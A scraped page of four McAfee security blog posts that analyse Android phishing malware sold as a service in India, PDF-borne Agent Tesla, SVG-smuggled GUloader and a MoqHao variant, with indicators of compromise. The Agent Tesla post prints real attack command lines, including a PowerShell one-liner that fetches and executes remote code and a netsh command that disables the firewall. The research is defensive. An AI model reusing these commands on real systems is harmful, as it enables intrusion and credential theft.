Normal view

There are new articles available, click to refresh the page.
Before yesterdayMcAfee Blogs

Android Phishing Scam Using Malware-as-a-Service on the Rise in India

14 March 2024 at 16:42

Authored by ZePeng Chen and Wenfeng Yu 

McAfee Mobile Research Team has observed an active scam malware campaign targeting Android users in India. This malware has gone through three stages. The first one is the development stage, from March 2023 to July 2023, during which a couple of applications were created each month. The second is the expansion stage, from August 2023 to October 2023, during which dozens of applications were created each month. The third is the active stage, from September 2023 to the present, during which hundreds of applications were created each month. According to McAfee’s detection telemetry data, this malware has accumulated over 800 applications and has infected more than 3,700 Android devices. The campaign is still ongoing, and the number of infected devices will continue to rise. 

Malware developers create phishing pages for scenarios that are easy to deceive, such as electricity bill payments, hospital appointments, and courier package bookings. Developers use different applications to load different phishing pages, which are eventually sold to scammers. In our research, more than 100 unique phishing URLs and more than 100 unique C2 URLs are created in these malicious applications. It means that each scammer can carry out scam activities independently. 

Scammers use malware to attack victims. They typically contact victims via phone, text, email, or social applications to inform them that they need to reschedule services. This kind of fraud attack is a typical and effective fraud method. As a result, victims are asked to download a specific app, and submit personal information. There was a report where an Indian woman downloaded malware from a link in WhatsApp and about ₹98,000 was stolen from her. We were not able to confirm if is the same malware, but it is just one example of how these malicious applications can be distributed directly via WhatsApp. 

The attack scenario appears credible, many victims do not doubt the scammers’ intentions. Following the instructions provided, they download and installed the app. In the app, victims are induced to submit sensitive information such as personal phone numbers, addresses, bank card numbers, and passwords. Once this information falls into the hands of scammers, they can easily steal funds from the victim’s bank account.  

The malware not only steals victims’ bank account information via phishing web pages but also steals SMS messages on victims’ devices. Because of the stolen information, even if the bank account supports OTP authentication, the scammer can transfer all the funds. The malware uses legitimate platforms to deploy phishing pages to make it appear more trustworthy to evade detection.  

McAfee Mobile Security detects this threat as Android/SmsSpy. For more information, and to get fully protected, visit McAfee Mobile Security. 

Malware-as-a-Service (MaaS) 

We discovered that these phishing pages and malware were being sold as a service by a cyber group named ELVIA INFOTECH. A distinct difference between this malware and others is that the apps sold have a valid expiration date. When the expiration date is reached, some application links will redirect to a payment notification page. The notification is clearly to request the purchaser to pay a fee to restore the use of the malware. 

Figure 1. Payment notification. 

We also discovered that the cybercriminal group was selling malware in a Telegram group. Based on these observations, we believe that ELVIA INFOTECH is a professional cybercriminal organization engaged in the development, maintenance, and sale of malware and phishing websites. 

 

Figure 2. Telegram Group conversation. 

Malware Analysis 

This malware has been maintained and recently updated, and hundreds of malicious applications were created. They like to use the file names such as “CustomerSupport.apk”, “Mahavitaran Bill Update.apk”, “Appointment Booking.apk”, “Hospital Support.apk”, “Emergency Courier.apk” and the application names such as “Customer Support”, “Blue Dart”, “Hospital Support”,” Emergency Courier” to trick victims, below are some applications’ names and icons.  

Figure 3. Some applications’ names and icons 

Not only do they pretend to be “Customer Support”, but they also pretend to be popular courier companies like “Blue Dart” in India, but they also target utility companies like “Mahavitaran” (Power Corporation of India). 

Once victims click the fake icon, the application will be launched and start to attack victims. 

1. Loading Phishing Pages

The phishing page loads once the application is launched. It will disguise itself as a page of various legitimate services, making victims believe that they are visiting a legitimate service website. Here, victims are tricked into providing sensitive information such as name, address, phone number, bank card number, and password. However, once submitted, this information falls into the hands of scammers, allowing them to easily access and control the victim’s bank account. 

We found that most of this attack campaign impersonated carrier package delivery companies. 

 

Figure 4. Phishing Pages Load Once App Launches 

The malware developers also designed different phishing pages for different applications to deceive victims in different scenarios that exploit electricity bill payments and hospital appointments. 

 

Figure 5. Hospital appointment and Electricity Bill Phishing Pages 

2. Stealing One-Time Passwords via SMS message 

As a core design of this malware, the application requests permissions to allow it to send and view SMS messages once it launches.   

Figure 6. Request SMS permissions. 

If victims click the “Allow” button, the malware starts a background service that secretly monitors users’ text messages and forwards them to a number which is from C2 server.  

 

 

Figure 7. Forward phone number from C2 server 

This step is crucial for the scam process, as many banks send a one-time password (OTP) to the customer’s phone for transaction verification. Using this method, the scammers can obtain these OTPs and successfully complete bank transactions. 

Conclusion: 

This malicious app and the developers behind it have emerged rapidly in India from last year to now, purposefully developing and maintaining malware, and focusing on deploying well-designed phishing websites through legitimate platforms. The group secretly promotes and sells its malware through social media platforms, making the spread of the malware more subtle and difficult to detect. This tactic resulted in an even more severe malware outbreak, posing an ongoing and serious threat to the financial security of Indian users. 

Malware campaigns are very persistent and using multiple different applications on different websites can trick many victims into installing these applications and providing their private and personal information, which can then be used to commit fraud. In this environment, ordinary users in India face huge cybersecurity challenges. Therefore, users need to remain vigilant and cautious when dealing with any electronic communications or application download requests that appear legitimate but may contain malware. We strongly recommend users install security software on their devices and always keep it up to date. By using McAfee Mobile Security products, users can further protect their devices and reduce the risks associated with this type of malware, providing a more secure experience. 

Indicators of Compromise (IOCs) 

SHA256 hash List: 

  • 092efedd8e2e0c965290154b8a6e2bd5ec19206f43d50d339fa1485f8ff6ccba  
  • 7b1f692868df9ff463599a486658bcdb862c1cf42e99ec717e289ddb608c8350  
  • c59214828ed563ecc1fff04efdfd2bff0d15d411639873450d8a63754ce3464c  
  • b0df37a91b93609b7927edf4c24bfdb19eecae72362066d555278b148c59fe85  
  • 07ad0811a6dac7435f025e377b02b655c324b7725ab44e36a58bc68b27ce0758  
  • c8eb4008fa4e0c10397e0fb9debf44ca8cbadc05663f9effbeac2534d9289377  
  • 1df43794618ef8d8991386f66556292429926cd7f9cf9b1837a08835693feb40  
  • 5b3d8f85f5637b217e6c97e6b422e6b642ce24d50de4a6f3a6b08c671f1b8207 

Phishing URLs: 

  • hxxps://bijlipayupdate[.]wixsite[.]com/my-site  
  • hxxps://appointmentservice0[.]wixsite[.]com/onlineappointment  
  • hxxps://couriers9343[.]wixsite[.]com/courier/  
  • hxxps://doctorappointment34[.]wixsite[.]com/appointmentbooking  
  • hxxps://hospitalservice402[.]wixsite[.]com/hospital-in  
  • hxxps://adn-reg[.]com/website 

C2 Server URLs: 

  • hxxps://forexroyality[.]online/complainf13/My_File[.]txt  
  • hxxps://adn-reg[.]com/data[.]json  
  • hxxps://icustomrcore[.]com/chand3/data[.]json  
  • hxxps://sms[.]hrms[.]org[.]in/chugxgddhmurgiwalabhaiqwertadmin/no[.]html  
  • hxxps://krishna[.]salaar[.]co[.]in/admindata[.]txt  
  • hxxps://courier[.]elviainfotech[.]cloud/pages/phone[.]json 

The post Android Phishing Scam Using Malware-as-a-Service on the Rise in India appeared first on McAfee Blog.

Rise in Deceptive PDF: The Gateway to Malicious Payloads

1 March 2024 at 17:40

Authored by Yashvi Shah and Preksha Saxena

McAfee Labs has recently observed a significant surge in the distribution of prominent malware through PDF files. Malware is not solely sourced from dubious websites or downloads; certain instances of malware may reside within apparently harmless emails, particularly within the PDF file attachments accompanying them. The subsequent trend observed in the past three months through McAfee telemetry pertains to the prevalence of malware distributed through non-portable executable (non-PE) vectors.

 

Figure 1: Rise in PDF malware

Why PDF?

Upon implementing Microsoft‘s macro-blocking measures for Internet-delivered Office files, threat actors were compelled to devise alternative methods for email malware distribution. The complex structure of PDF files renders them susceptible to exploitation, posing significant challenges in detecting malicious content within. As a commonly employed file format distributed via email attachments in the consumer domain, PDFs represent an enticing avenue for attackers to deceive users into believing they are benign. Exploiting this trust, attackers can readily craft PDF-based malware, often containing payloads hosted on malicious websites. Upon user interaction, such as clicking a link, these PDFs download the hosted payload, exacerbating the risk of infection.

Infection Chain

This emerging infection chain involving, among others, Agent Tesla, initiates from an email containing a PDF attachment, which subsequently facilitates the dissemination of the ultimate payload. In the outdated and unpatched version of Acrobat Reader, PDFs directly execute embedded JavaScript using MSHTA, subsequently launching PowerShell, which facilitates process injection. Conversely, in the latest version of Acrobat Reader, PDFs are unable to execute JavaScript directly. Instead, they redirect to a malicious website, from which the script is downloaded. The subsequent process remains consistent with the previous case. The kill chain for the delivery of Agent Tesla unfolds as follows:

Figure 2: Infection Chain

Initial Access:

Firstly, we shall address the scenario involving the updated version of Acrobat Reader, as it is likely that the majority of users will have this version installed. Typically, these PDF files are disguised under various themes such as invoices featuring a prominent download button, messages prompting immediate action, or buttons designed to redirect users to seemingly benign destinations.

In a recent attack, a file named “Booking.com-1728394029.pdf” was used. It is evidently targeting users under the guise of being affiliated with Booking.com. It displays a prompt stating, “Lettore non è compatibile!”, which translates to “Player is not compatible,” as depicted in the provided Figure below.

Figure 3: Face of PDF attachment

Upon examining the internal structure of the PDF (Figure 4), it was discovered that within one of the seven objects, some hex data and an embedded URL were identified. The URL highlighted in the red box “https://bit[.]ly/newbookingupdates” is a Bitly URL. Attackers use Bitly URLs to hide malicious links, making them harder to detect. This is especially useful in phishing schemes where they trick users into revealing sensitive information. Bitly’s dynamic links allow attackers to change destinations, enhancing their ability to evade detection. Additionally, attackers exploit the trust associated with Bitly to improve the success of their social engineering tactics.

This URL is intended to connect to https://bio0king[.]blogspot[.]com

Figure 4: Embedded data in PDF

The text in yellow highlighted in Figure 4, appears to be in hexadecimal format. Upon converting it to ASCII, the result is as follows:

Figure 5: ASCII Conversion

This is the reason behind the prompt observed in Figure 3, displaying the same alert message upon opening the PDF document.

After clicking “OK,” another prompt appeared from Adobe Player, cautioning about the connection established to the address mentioned in the prompt i.e. “bit.ly”.

Figure 6: Connection to embedded URL

Upon granting permission for redirection, the user is directed to the website “https://bio0king[.]blogspot[.]com”. Thus, an attempt is made to disguise itself as a legitimate Booking.com website. As illustrated in the figure below, Microsoft Defender SmartScreen alerts the user to the harmful nature of this website. Despite the warning, further analysis was conducted by proceeding to the website to observe subsequent actions.

Figure 7: Connection to disguised website

Upon accessing the website, it was observed that a JavaScript file named “Booking.com-1728394029.js” was promptly downloaded. The js file was intentionally named identically to the PDF file in an effort to deceive users into opening it.

Figure 8: Prompt of JS file download

Immediately upon initiating the download, redirection is triggered to the legitimate Booking.com website, aiming to prevent users from detecting any suspicious activity. The downloaded file is stored in the Downloads folder on the user’s system.

Figure 9: JS file downloaded

The content of the JavaScript file is heavily obfuscated. This tactic is commonly employed by attackers to conceal their code, thus complicating analysis efforts and evading detection mechanisms.

Figure 10: JS file content

Execution:

Upon executing the JavaScript, the following process tree was observed:

Figure 11: Process tree

Command line:

  • “C:\Windows\System32\WScript.exe” ” C:\Users\admin\Downloads\ Booking.com-1728394029.js”
    • “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm htloctmain25.blogspot.com/////////////////////////atom.xml) | . (‘i*x’).replace(‘*’,’e’);Start-Sleep -Seconds 5
      • \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      • “C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe” /noconfig /fullpaths @”C:\Users\admin\AppData\Local\Temp\mk2qsd2s.cmdline”
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 “/OUT:C:\Users\admin\AppData\Local\Temp\RES6D2D.tmp” “c:\Users\admin\AppData\Local\Temp\CSC7C83DF075A344945AED4D733783D6D80.TMP”
      • “C:\Windows\system32\netsh.exe” advfirewall set allprofiles state off -ErrorAction SilentlyContinue
      • “C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe”

Upon decoding and executing “Booking.com-1728394029.js,” a URL was acquired: “htloctmain25.blogspot.com/////////////////////////atom.xml.”

Using the PowerShell command line, an attempt was made to access the file located at htloctmain25.blogspot.com/////////////////////////atom.xml, followed by executing the file using Invoke-Expression (iex). In this instance, the attackers attempted to obfuscate the Invoke-Expression (iex) command by using the replace command within the PowerShell command line. As illustrated in the command line, a sleep command was implemented, pausing execution for 5 seconds. Subsequent stages of the infection proceeded after this interval.

The file hosted at http://htloctmain25.blogspot.com/////////////////////////atom.xml is named atom.ps1, measuring approximately 5.5 MB in size. The figure below depicts the content of the file:


Figure 12: Content of .ps1 file

Let’s begin deciphering this script shown in Figure 11 with reference:

The Red marked content at the top of the script indicates that it will terminate several specified processes (“RegSvcs”, “mshta”, “wscript”, “msbuild”, “FoxitPDFReader”), presumably with the intention of injecting the final payload into one of these legitimate binaries. Furthermore, the script creates a directory at “C:\ProgramData\MINGALIES” for potential future utilization.

The Blue marked content within the script represents the decryption function, labeled as “asceeeeeeeeeeeeeeee”. This function is subsequently employed to decrypt various variables within the script.

The Green marked content towards the end of the script outlines the implementation of the persistence mechanism and describes the injection process into legitimate executables.

For reference and ease of comprehension, the variables defined in the script have been numbered accordingly. The decryption instructions for these variables are highlighted in Yellow for clarity and emphasis.

Following the sequence of instructions, if any of the specified processes are terminated, the script proceeds to define variables 1 and 2. Subsequently, the decryption loop is defined in the script. After the decryption loop, variable 3, named “Phudigum”, is defined in the script. Following that, the script decrypts variable 3 and executes the obtained decoded data using the Invoke-Expression (IEX) command.

Defense Evasion:

The content of the decoded variable 3 is as follows:

Figure 13: Variable 3 after decryption

The code first bypasses the Microsoft Windows Anti-Malware Scan Interface (AMSI) scanning by setting a specific value and then proceeds to create registry entries for persistence. The script also defines functions for interacting with the system’s memory and sets global error action preferences to silently continue, suppressing any errors. It checks if a type named AMSIReaper exists and if not, defines this type with various declarations for interacting with the Windows kernel32.dll, including functions related to process memory manipulation.

Furthermore, the script executes a series of malicious actions aimed at compromising the security of the system. It begins by adding exclusions for specific file extensions, paths, and processes in Windows Defender, effectively evading detection for these items. Subsequently, it attempts to alter various Windows Defender preferences, such as disabling critical security features like the Intrusion Prevention System, Real-time Monitoring, and Script Scanning, while also adjusting settings related to threat actions and reporting. Furthermore, the script tries to modify registry settings associated with User Account Control (UAC) and disable the Windows Firewall, further weakening the system’s defenses. Lastly, it resets the global error action preference to continue, potentially concealing any errors encountered during execution and ensuring the script’s malicious actions remain undetected. Overall, these actions indicate a concerted effort to compromise the system’s security and potentially enable further malicious activities.

Privilege Escalation:

The subsequent instruction in Figure 11 involves decrypting variable 2, labeled as “bulgumchupitum,” utilizing the decryption function “asceeeeeeeeeeeeeeee.” And the same is executed by Invoke-Expression (IEX) command. Following is the decoded content of variable 2:

Figure 14: Variable 2 after decryption

The content obtained after decrypting variable 2 holds significant importance. The highlighted section in Red does the following:

  • Introduces another decryption function specifically tailored for this script, named “kimkarden.”
  • Additionally, the variable “muthal,” marked as variable 1 in Figure 11, is utilized within this script rather than in the main .ps1 file.
  • Furthermore, another variable is defined, and its content is stored in the variable “pinchs.”
  • Finally, the content of both variables, “muthal” and “pinchs,” is decrypted using the decryption function “kimkarden” and stored as byte arrays in data 1 and data 2, marked as 5 and 6, respectively, in Figure 13.
  • Data 1 and Data 2 are found to be .NET executables

The next section marked Blue in Figure 13, does the following:

  • After a brief sleep, the script loads an assembly using the decoded content, data 1, and executes a command through reflection.
  • The script defines a function named ExecuteCommand, which utilizes reflection to dynamically invoke method ‘C’ from a type named ‘A.B’ loaded from an assembly.
  • It defines paths to various .NET framework executables (RegSvcs.exe for versions 2.0 and 4.0, and Msbuild.exe for version 3.5).
  • It invokes the $invokeMethod with the $nullArray and parameters: the path of .NET framework executables and $data2 (decoded byte array).

Process Injection:

Figure 15: Data 1

Data 1 comprises a .NET DLL file. As previously indicated, the script invokes the method ‘C’ from the type named ‘A.B’. Despite the high level of obfuscation in the file shown in Figure 15, the presence of method ‘C’ can be observed (highlighted in yellow). Additionally, within the script, there is a specific function where the path to framework executables and data are being passed (highlighted within the red box).

Figure 16: Data 1 dll

This DLL is responsible for injecting data2, which is Agent Tesla, as a payload into the Regsvcs.exe process. The following figure shows the configuration of data2. The depicted configuration of data2 disguises it as a legitimate McAfee package file shown in Figure 16. However, it lacks a valid certificate, indicating its fraudulent nature.

Figure 17: Data2

The executable file exhibits a high degree of obfuscation, rendering its content largely unreadable. Numerous methods are present, each bearing meaningless names, a deliberate tactic employed to impede analysis by researchers.

Figure 18: Data2 exe

Discovery:

The attackers have intricately orchestrated the obfuscation process. Each string undergoes decryption through a series of instructions, with specific parameters being passed to obtain the deciphered content. This meticulous approach is designed to add layers of complexity and hinder straightforward analysis. For instance, in Figure 18, through reverse engineering, we can observe how it begins querying the browser for information. The highlighted instruction is the one which after decrypting gives the path of the Opera browser.

Figure 19: Fetching browser information

The following ProcMon logs show all the broswers the malware queried:

Figure 20: Procmon logs of browsers(1)

Figure 21: Procmons logs for browsers(2)

Credential Access:

In addition to this, it steals sensitive information such as browser history, cookies, credentials, SMTP information, session information, and email client data such as Otlook profiles, etc.

Figure 22: Credentials

Exfiltration:

Through debugging the code, we were able to uncover the domain it was utilizing for exfiltration. The following figure shows the URL used for exfiltration:

Figure 23: Domain obtained

The same was evident from Procmon logs shown in the Figure below:

Figure 24: Procmon logs of Connection for exfiltration

The DNS record of IP address 149.154.167.220 belongs to Telegram messenger.


Figure 25: DNS record

AgentTesla leverages Telegram bots for data exfiltration due to several advantageous factors. Firstly, Telegram provides robust end-to-end encryption, ensuring the security of transmitted data. Secondly, the platform offers anonymity for bot creators, enhancing the stealth of malicious activities. Thirdly, Telegram’s user-friendly interface simplifies communication processes for both attackers and their command-and-control infrastructure. Additionally, since Telegram is a widely used messaging platform, traffic to its servers may appear less suspicious compared to other channels, aiding in evading detection. Moreover, Telegram’s infrastructure resilience makes it a reliable option for maintaining communication channels even amidst takedown efforts.

Overall, the combination of security, anonymity, ease of use, stealth, and resilience makes Telegram bots an appealing choice for AgentTesla’s data exfiltration tactics. And to achieve this, it establishes contact with the respective domain associated with the bot and transmits the data, which is then tracked by a specific bot ID.


Figure 26: TelegramBot for exfiltration

In a nutshell, this script was tasked with decoding the payload, retrieving legitimate .NET executable paths, performing process injection to execute the malware, collecting data, and ultimately exfiltrating the acquired information.

Persistence:

Moving forward with atom.ps1 (Figure 11), the next is variable 4, labeled as “koaskodkwllWWW”, and is decrypted using the function “asceeeeeeeeeeeeeeee”. Upon decryption, the content is decoded as follows:

Figure 27: Variable 4 decoded

This script establishes persistence by:

  1. Creating an HTA script to execute PowerShell commands fetched remotely. The script incorporates JavaScript code that utilizes ActiveX objects to execute commands. Specifically, it creates an instance of WScript.Shell to run a PowerShell command fetched from a remote location (linkcomsexi).
  2. It registers a scheduled task named “Tnamesexi” utilizing Register-ScheduledTask. The task is set to trigger once at a specific time, calculated by adding a certain number of minutes (mynsexi) to the current time.
  3. Lastly, it sets a registry value under the current user’s Run key (HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run). This registry value, named “Tnamesexi,” is configured to execute the command schtasks /run /tn $taskName, thereby manually triggering the scheduled task established in the preceding step.

Ultimately, the content highlighted in green in Figure 11 performs the final task. The instructions are as follows:

Figure 28: Persistence instructions

Now, after substituting the values:

  • “mynsexi” is set to “213”, indicating that the script will be executed again after 213 minutes.
  • “Tnamesexi” is defined as “chromeupdateri”, implying that a Run entry will be created under this name.
  • “linkcomsexi” is assigned the value “htljan62024.blogspot.com//////////atom.xml”, suggesting that the atom.ps1 file will be fetched again from this URL.

We inspected registry entries and scheduled task entries for cross-verification. And the script did as directed:

Figure 29: Registry entry for Persistence

Figure 30: Task Scheduler

Figure 31: Procmon logs for persistence

In summary, the script is configured to execute again after 213 minutes, creating a Run entry named “chromeupdateri” and fetching the atom.ps1 file again from “htljan62024.blogspot.com//////////atom.xml”.

Execution with old and unpatched version of Acrobat Reader:

Upon opening the PDF in the old, unpatched version of Acrobat Reader, a prompt immediately appeared indicating the launch of MSHTA along with the entire JavaScript code contained therein. This is depicted in the figure below.

Figure 32: Prompt for embedded javascript

Upon examining the streams of the PDF, we discovered the identical script embedded within the document:

Figure 33: Embedded javascript in PDF

After the launch of MSHTA, an instance of PowerShell is invoked, initiating process injection into Regsvcs.exe and injection of AgentTesla. Consequently, utilizing an old and unpatched version of Acrobat Reader, interaction with the PDF is unnecessary; mere opening of the PDF file results in system infection by the malware.

Summary:

The chain of events initiates with the delivery of a PDF file containing malicious content. Upon opening the PDF, the embedded malicious code triggers the execution of a JavaScript payload, leading to the download and execution of a PowerShell script. This PowerShell script then decrypts and executes a binary, in the form of a .NET DLL file, which injects AgentTesla payload into legitimate processes to evade detection. The malware communicates with command-and-control servers, exfiltrating sensitive data through Telegram bots for stealthy transmission. To ensure persistence, the malware establishes scheduled tasks and registry entries, allowing it to execute periodically and maintain its presence on the infected system. In the old version of Acrobat Reader, opening the PDF triggered the automatic execution of malicious JavaScript, leading to the injection of AgentTesla malware via PowerShell into Regsvcs.exe. Inspection of the PDF streams revealed the embedded script, further confirming the exploitation of vulnerabilities without requiring user interaction. This orchestrated sequence underscores the sophisticated nature of the attack, spanning from initial infection to data exfiltration and persistent infiltration, posing significant challenges for detection and mitigation efforts.

Mitigation:

Avoiding falling victim to email phishing involves adopting a vigilant and cautious approach. Here are some common practices to help prevent falling prey to email phishing:

  • Verify Sender Information
  • Think Before Clicking Links and Warnings
  • Check for Spelling and Grammar Errors
  • Be Cautious with Email Content
  • Verify Unusual Requests
  • Use Email Spam Filters
  • Check for Secure HTTP Connections
  • Delete Suspicious Emails
  • Keep Windows and Security Software Up to date
  • Use the latest and patched version of Acrobat reader

Indicators of Compromise (IOCs)

PDF 8f8264c173e6d036e87b706dbb87e3036ae17df32e53a683c87bff94fce2c242
Javascript 3ea81c292f36f2583d2291e8a393014da62767447dba7b139a6c45574647aa2b
ps1 file db726e060f4feccf4bdfa843e3c10cbac80509585fd55c6d1bfce5e312a4e429
dll 5b6d8f91201ba9c879e46062190817954e28ceb61a67e55870bb61d1960854ee
exe dec2ce698ab8600d96dd3353b5e47d802441c6df18aed1dd6a2b78311369659e
IPv4 149.154.167.220
URL http://htloctmain25.blogspot[.]com/atom.xml
URL https://bio0king[.]blogspot[.]com

Table 1: Indicators of Compromise

 

 

 

 

The post Rise in Deceptive PDF: The Gateway to Malicious Payloads appeared first on McAfee Blog.

GUloader Unmasked: Decrypting the Threat of Malicious SVG Files

29 February 2024 at 03:02

Authored by: Vignesh Dhatchanamoorthy

In the ever-evolving landscape of cybersecurity threats, staying ahead of malicious actors requires a deep understanding of their tactics and tools. Enter GUloader, a potent weapon in the arsenal of cybercriminals worldwide. This sophisticated malware loader has garnered attention for its stealthy techniques and ability to evade detection, posing a significant risk to organizations and individuals.

One of GUloader’s distinguishing features is its utilization of evasion techniques, making it particularly challenging for traditional security measures to detect and mitigate. Through polymorphic code and encryption, GUloader can dynamically alter its structure, effectively masking its presence from antivirus software and intrusion detection systems. This adaptability enables GUloader to persistently infiltrate networks and establish footholds for further malicious activity.

McAfee Labs has observed a recent GUloader campaign being distributed through a malicious SVG file delivered via email.

Scalable Vector Graphics (SVG)

The SVG (Scalable Vector Graphics) file format is a widely used vector image format designed for describing two-dimensional vector and mixed vector/raster graphics in XML. One of the key features of SVG files is their support for interactivity and animation, achieved through JavaScript and CSS.

Modern web browsers such as Google Chrome, Mozilla Firefox, and Microsoft Edge have built-in support for rendering SVG files. When you open an SVG file in Chrome or Firefox, the browser renders the vector graphics using its built-in SVG rendering engine. This engine interprets the XML-based SVG code and displays the image accordingly on the web page.

Browsers treat SVG files as standard web content and handle them seamlessly within their browsing environments.

Execution Chain

Figure 1: Infection chain

The execution process begins with the opening of an SVG file from an email attachment. This action triggers the browser to download a ZIP file. Within this ZIP file is a WSF (Windows Script File), acting as the conduit for the subsequent stage. Upon execution of the WSF, wscript calls the PowerShell command to establish a connection with a malicious domain and execute the hosted content. This content includes shellcode injected into the MSBuild application, facilitating further malicious actions.

Figure 2: Process Tree

Technical Analysis

A recipient receives a spam email that contains malware embedded in archived attachments. The attachment contains a malicious SVG file named “dhgle-Skljdf.svg”

Figure 3: Spam Email

JavaScript that was smuggled inside of the SVG image contained the entire malicious zip archive. When the victim opened the attachment from the email the smuggled JavaScript code inside the SVG image created a malicious zip archive, and then presented the user with a dialog box to decrypt and save the file.

Figure 4: Saving file prompt

The SVG file utilizes a Blob object that contains the embedded zip file in base64 format. Subsequently, the zip file is dropped via the browser when accessed.

Figure 5: SVG file code

Inside the zip file, there is an obfuscated WSF (Windows Script File). The WSF script employs several techniques to make analysis quite difficult.

Figure 6: Obfuscated WSF Script

It invokes PowerShell to establish a connection with a malicious domain, subsequently executing the hosted content retrieved from it.

Encoded PowerShell

Figure 7: Encoded PowerShell code

After Decoding

Figure 8: Decoded PowerShell code

URL: hxxps://winderswonders.com/JK/Equitably.mix

The URL hosts base64-encoded content, which, after decoding, contains shellcode and a PowerShell script.

Hosted Content

Figure 9: Hosted Base64 content

After decoding Base64

Figure 10: Decoded Base64 content

The above PowerShell script attempts to load the shellcode into the legitimate MSBuild process using the Process Hollowing technique.

After injection, the shellcode executes anti-analysis check then it modifies the Registry run key to achieve persistence.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

The final stage uses the injected shellcode to download and execute the final malicious executable. GuLoader can also download and deploy a wide range of other malware variants.

 

Indicator of Compromise (IOCs)

File SHA256/URL
Email 66b04a8aaa06695fd718a7d1baa19386922b58e797634d5ac4ff96e79584f5c1
SVG b20ea4faca043274bfbb1f52895c02a15cd0c81a333c40de32ed7ddd2b9b60c0
WSF 0a196171571adc8eb9edb164b44b7918f83a8425ec3328d9ebbec14d7e9e5d93
URL hxxps://winderswonders[.]com/JK/Equitably[.]mix

The post GUloader Unmasked: Decrypting the Threat of Malicious SVG Files appeared first on McAfee Blog.

MoqHao evolution: New variants start automatically right after installation

8 February 2024 at 07:29

Authored by Dexter Shin 

MoqHao is a well-known Android malware family associated with the Roaming Mantis threat actor group first discovered in 2015. McAfee Mobile Research Team has also posted several articles related to this malware family that traditionally targets Asian countries such as Korea and Japan. 

 Recently McAfee Mobile Research Team found that MoqHao began distributing variants using very dangerous technique. Basically, the distribution method is the same. They send a link to download the malicious app via the SMS message. Typical MoqHao requires users to install and launch the app to get their desired purpose, but this new variant requires no execution. While the app is installed, their malicious activity starts automatically. This technique was introduced in a previous post but the difference is that this dangerous technique is now being abused by other well-known active malware campaigns like MoqHao. We have already reported this technique to Google and they are already working on the implementation of mitigations to prevent this type of auto-execution in a future Android version. Android users are currently protected by Google Play Protect, which is on by default on Android devices with Google Play Services. Google Play Protect can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play. McAfee Mobile Security detects this threat as Android/MoqHao. 

How it is distributed 

MoqHao is distributed via phishing SMS messages (also known as Smishing). When a user receives an SMS message containing a malicious link and clicks it, the device downloads the malicious application. Phishing messages are almost the same as in previous campaigns: 


Figure 1. Smishing message impersonating a notification from a courier service. 

One noticeable change is that they now use URL shortener services. If the malware authors use their own domain, it can be quickly blocked but if they use legitimate URL shortener services, it is difficult to block the short domain because it could affect all the URLs used by that service. When a user clicks on the link in the message, it will be redirected to the actual malicious site by the URL shortener service. 

What is new in this variant 

As mentioned at the beginning, this variant behaves differently from previous ones. Typical MoqHao must be launched manually by the user after it is installed but this variant launches automatically after installation without user interaction: 

Figure 2. Differences between typical MoqHao and Modern MoqHao

We explained this auto-execution technique in detail in a previous post but to briefly summarize it here, Android is designed so when an app is installed and a specific value used by the app is set to be unique, the code runs to check whether the value is unique upon installation. This feature is the one that is being abused by the highly active Trojan family MoqHao to auto-execute itself without user interaction. The distribution, installation, and auto-execution of this recent MoqHao variant can be seen in the following video: 

 

On the other hand, this recent MoqHao variant uses Unicode strings in app names differently than before. This technique makes some characters appear bold, but users visually recognize it as “Chrome”. This may affect app name-based detection techniques that compare app name (Chrome) and package name (com.android.chrome): 

Figure 3. App name using Unicode strings.

 

Additionally, they also use social engineering techniques to set malicious apps as the default SMS app. Before the settings window appears, they show a message telling you to set up the app to prevent spam, but this message is fake: 

Figure 4. Fake message using social engineering techniques. 

 

Also, the different languages used in the text associated with this behavior suggests that, in addition to Japan, they are also targeting South Korea, France, Germany, and India: 

Figure 5. Fake messages designed to target different countries.

 

After the initialization of the malware is completed, it will create a notification channel that will be used to display phishing messages: 

Figure 6. Create a notification channel for the next phishing attack.

 

The malware checks the device’s carrier and uses this notification to send phishing messages accordingly to trick users into clicking on them. MoqHao gets the phishing message and the phishing URL from Pinterest profiles 

 

Figure 7. Phishing message and URL in Pinterest profile

 

If the phishing string is empty, MoqHao will use the phishing message in the code: 

Figure 8. Phishing notification code for each carrier

 

This variant also connects to the C2 server via WebSocket. However, it has been confirmed that several other commands have been added in addition to the commands introduced in the previous post: 

Command  Description 
getSmsKW  Send all SMS messages to C2 server 
sendSms  Send SMS messages to someone 
setWifi  Enable/disable Wifi 
gcont  Send whole contacts to C2 server 
lock  Store Boolean value in “lock” key in SharedPreferences 
bc  Check SIM state 
setForward  Store String value in “fs” key in SharedPreferences 
getForward  Get String value in “fs” key in SharedPreferences 
hasPkg  Check specific package installed on device 
setRingerMode  Set Sound/Vibrate/Silent mode 
setRecEnable  Set Vibrate/Silent mode according to SDK version 
reqState  Send device information (Network, Power, MAC, Permission) to C2 server 
showHome  Emulate Home button click 
getnpki  Send Korean Public Certificate (NPKI) to C2 server 
http  Send HTTP requests 
call  Call a specific number with Silent mode 
get_apps  Get list of installed packages 
ping  Check C2 server status 
getPhoneState  Get unique information such as IMEI, SIM number, Android ID, and serial number 
get_photo  Send all photos to C2 server 

MoqHao malware family is an active malware that has been around for years. Although many years have passed, they are using more and more different ways to hide and reach users. We are seeing a much higher number of C2 commands than in previous, the active use of legitimate sites like Pinterest to store and update phishing data, and code with the potential to target Asian countries like Japan and South Korea, as well as countries like France, Germany, and India. Moreover, we expect this new variant to be highly impactful because it infects devices simply by being installed without execution. 

 It is difficult for general users to find fake apps using legitimate icons and application names, so we recommend users to install secure software to protect their devices. For more information, visit McAfee Mobile Security. 

Indicators of Compromise (IOCs) 

SHA256  Application Name  Package Name 
2576a166d3b18eafc2e35a7de3e5549419d10ce62e0eeb24bad5a1daaa257528  chrome  gb.pi.xcxr.xd 
61b4cca67762a4cf31209056ea17b6fb212e175ca330015d804122ee6481688e  chrome  malmkb.zdbd.ivakf.lrhrgf 
